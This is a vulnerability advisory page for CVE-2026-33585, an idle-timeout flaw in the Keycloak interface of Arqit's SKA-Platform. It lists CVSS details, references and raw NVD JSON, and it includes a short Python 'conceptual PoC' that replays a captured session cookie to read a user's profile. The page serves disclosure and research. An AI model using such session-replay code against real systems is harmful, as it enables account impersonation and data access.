CVE-2026-33585

Description

Improper management of the idle timeout parameter in the Keycloak interface of the Arqit SKA-Platform enables an attacker to impersonate an authenticated tenant user via an unexpired browser session. This issue affects Symmetric Key Agreement Platform: before 26.03.

CVSS Details

CVSS Score

3.8

Severity

LOW

CVSS Vector

CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Symmetric Key Agreement Platform < 26.03

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for Session Hijacking via Idle Timeout Issue
# Attacker needs physical access to the target machine.

import requests

# The session cookie found in the browser of the unattended terminal
session_cookie = "JSESSIONID=XXXXXXXXXXXX; KeycloakIdentity=YYYYYYYY"

target_url = "https://target-ska-platform.com/keycloak/api/user/profile"

headers = {
    "Cookie": session_cookie,
    "User-Agent": "Mozilla/5.0 (Attacker PoC)"
}

# Attempt to access a protected resource using the old session
response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    print("[+] Exploit Successful! Session is still valid.")
    print("[+] User Data:", response.json())
else:
    print("[-] Exploit Failed. Session might have expired.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33585
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33585
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33585/
[4] VulDB https://vuldb.com/cve/CVE-2026-33585
[5] https://www.cvcn.gov.it/cvcn/cve/CVE-2026-33585

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33585", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-13T19:17:07.330", "lastModified": "2026-05-14T17:19:49.973", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper management of the idle timeout parameter in the Keycloak interface of the Arqit SKA-Platform enables an attacker to impersonate an authenticated tenant user via an unexpired browser session.\n\n\n\nThis issue affects Symmetric Key Agreement Platform: before 26.03."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.4, "impactScore": 3.4}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-233"}]}], "references": [{"url": "https://www.cvcn.gov.it/cvcn/cve/CVE-2026-33585", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}